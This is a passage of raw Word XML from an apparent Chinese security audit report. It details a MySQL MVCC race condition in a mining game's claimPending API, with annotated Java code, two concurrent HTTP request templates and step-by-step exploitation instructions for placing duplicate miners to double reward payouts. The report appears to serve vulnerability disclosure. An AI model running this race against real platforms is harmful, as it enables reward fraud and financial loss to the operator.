        <w:t xml:space="preserve">然而，当目标坑位为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7/8/9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（需走解锁检查分支）时，代码在步骤①之前额外执行了一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>普通 SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（非 locking read）：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userSlotUnlockRepository.findByUserIdAndSlotId(userId, slotId)  // 普通 SELECT → 建立 T2 的 MVCC 快照</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">在 MySQL 默认隔离级别 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>REPEATABLE READ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>事务内首次一致性读（普通 SELECT）将建立该事务的 MVCC 快照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，此后所有后续普通 SELECT 均复用此快照，直至事务结束。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>竞态窗口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>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T1（recordId=R1, slotId=7）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T2（recordId=R2, slotId=7）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R1 的 FOR UPDATE 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 R2 的 FOR UPDATE 锁（不同行，无竞争）</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findByUserIdAndSlotId</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 建立 T1 快照</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findByUserIdAndSlotId</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 建立 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>T2 快照（S₂）</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获得 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>findByUserIdAndInStorageForUpdate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> X 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findByUserIdAndInStorageForUpdate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 处</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>等待 T1 的 X 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检查坑位 7 为空，插入矿机，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>事务提交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—（仍阻塞中）—</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解除阻塞，获得 X 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findByUserIdAndSlotIdAndInStorage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 普通 SELECT </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>使用旧快照 S₂</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，S₂ 早于 T1 提交，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>看不到 T1 插入的矿机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坑位判断为空，再次插入矿机 → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>坑位 7 存在两台矿机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>T2 的快照 S₂ 建立于 T1 提交之前，因此步骤②的普通 SELECT 读取到的是过期数据，绕过了坑位占用检查，导致同一坑位被放置两台矿机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="671"/>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POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/miner/claimPending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 经 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（签名 + Nonce 防重放）和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（Token 校验）双重鉴权，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 由 Token 解析注入（不可伪造）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 均来自请求体，攻击者完全可控。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>触发路径：两个合法并发请求携带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不同的 `recordId`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（R1、R2，各自由 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByIdAndUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 独立锁行，互不阻塞）+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>相同的 `slotId`（7/8/9）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，在用户已有其他槽位矿机时，T2 在串行化锁处被 T1 阻塞，而 T2 的 MVCC 快照已在更早的解锁检查 SELECT 中建立完毕，导致坑位占用检查读到过期数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="672"/>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spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每台矿机持续产生哈希率贡献并据此分配挖矿收益。同一坑位存在两台矿机，攻击者该坑位哈希率实际翻倍，可持续获取超出设计上限的挖矿奖励，对平台造成长期持续的资金损耗。</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入口：MinerController.java</w:t>
              <w:br/>
              <w:t>// ClaimPendingForm 字段定义（攻击者可控）：</w:t>
              <w:br/>
              <w:t>//   Integer slotId;   ← 目标坑位（攻击者指定为 7/8/9）</w:t>
              <w:br/>
              <w:t>//   Long recordId;    ← 待领取记录 ID（攻击者分别传入 R1/R2）</w:t>
              <w:br/>
              <w:t>@PostMapping("/claimPending")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; claimPending(@CurrentUserId Long userId, @RequestBody ClaimPendingForm form) { // ← HTTP 可控入口，userId 来自 Token 安全可信</w:t>
              <w:br/>
              <w:t xml:space="preserve">    pendingMinerService.claim(userId, form.getSlotId(), form.getRecordId()); // ← slotId/recordId 污点传入 service 层</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 竞态漏洞点：PendingMinerService.java - claim()</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public UserMiner claim(Long userId, Integer slotId, Long recordId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // R1/R2 分别独立锁行，T1/T2 在此无竞争，并发推进</w:t>
              <w:br/>
              <w:t xml:space="preserve">    PendingMinerReward record = pendingMinerRewardRepository.findByIdAndUserIdForUpdate(recordId, userId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(...); // ← T1 锁 R1 行，T2 锁 R2 行，互不阻塞</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // 【关键】slotId=7/8/9 分支：此处触发普通 SELECT（一致性读），建立 T2 的 MVCC 快照 S₂</w:t>
              <w:br/>
              <w:t xml:space="preserve">    boolean slotUnlocked = slotId &lt;= 6 || userSlotUnlockRepository.findByUserIdAndSlotId(userId, slotId) // ← T2 首次一致性读，MVCC 快照 S₂ 在此建立（早于 T1 提交）</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .map(u -&gt; u.getIsUnlocked() != null &amp;&amp; u.getIsUnlocked() == 1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElse(false);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // 串行化锁：T2 在此处等待 T1 持有的 X 锁（T1 正在处理 slotId=7）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.findByUserIdAndInStorageForUpdate(userId, 0); // ← T2 阻塞于此；T1 插入矿机并提交后 T2 才解除阻塞</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // 【漏洞点】坑位检查为普通 SELECT，复用旧快照 S₂；S₂ 建立时 T1 尚未提交，故 T2 看不到 T1 插入的矿机</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0).isPresent()) { // ← T2 使用旧快照 S₂，坑位 7 返回</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> empty，绕过占用检查</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("该坑位已有矿机");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = new UserMiner();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setUserId(userId);       // ← userId 来自 Token，安全</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setMinerLevel(record.getMinerLevel());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(slotId);       // ← slotId=7，坑位已被 T1 占用，但 T2 误判为空</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setInStorage(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.save(miner); // ← 漏洞触发：T2 向已占用坑位再次插入矿机，坑位 7 存在两台矿机</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以下两个请求需使用多线程/并发工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（满足前置条件：用户已有其他坑位矿机至少 1 台、坑位 7 已解锁、持有 R1/R2 两条待领取记录、坑位 7 当前为空）：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1（T1，使用待领取记录 R1）</w:t>
              <w:br/>
              <w:t>POST /api/miner/claimPending HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;valid_user_token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;app_key&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_1&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;valid_signature_for_request_1&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotId": 7, "recordId": &lt;R1_record_id&gt;}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 请求 2（T2，使用待领取记录 R2，与请求 1 同时发送）</w:t>
              <w:br/>
              <w:t>POST /api/miner/claimPending HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;valid_user_token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;app_key&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_2&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;valid_signature_for_request_2&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotId": 7, "recordId": &lt;R2_record_id&gt;}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="673"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>准备前置条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用正常游戏流程，确保账户满足：① 坑位 1-6 中已有至少 1 台矿机（确保步骤③的 SELECT FOR UPDATE 能锁定至少一行，使 T2 实际等待）；② 坑位 7（或 8/9）已完成解锁；③ 持有至少 2 条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status != STATUS_CLAIMED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 且 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>amount &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的待领取记录（R1、R2）；④ 坑位 7 当前无矿机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="674"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并发发送请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用脚本（如 Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>concurrent.futures.ThreadPoolExecutor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）并发提交上述两个请求，两者使用相同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId=7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，但分别携带 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId=R1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId=R2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，并各自生成独立有效的签名（nonce 不同）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="675"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>验证结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：调用矿机列表接口，观察坑位 7 存在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2 台矿机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（均属当前用户），两台矿机均处于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（在槽位中）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（运行中）状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
